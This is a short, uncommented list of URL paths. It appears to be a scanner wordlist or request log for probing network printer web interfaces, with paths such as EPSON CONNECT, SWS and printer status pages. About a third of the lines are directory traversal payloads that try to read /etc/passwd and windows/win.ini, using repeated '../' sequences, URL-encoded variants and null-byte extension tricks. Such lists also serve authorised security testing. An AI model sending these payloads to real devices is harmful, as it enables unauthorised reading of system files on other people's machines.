/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
/js/../../../../../../../../etc/passwd%00.jpg
/PRESENTATION/EPSONCONNECT
/cgi-bin/home
/PRESENTATION/HTML/TOP/PRTINFO.HTML
/hdstat.htm
/sws/index.html
/sws/index.sws
/general/status.html
/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm
/net/net/net.html
/./../../../../../../../../../../etc/passwd
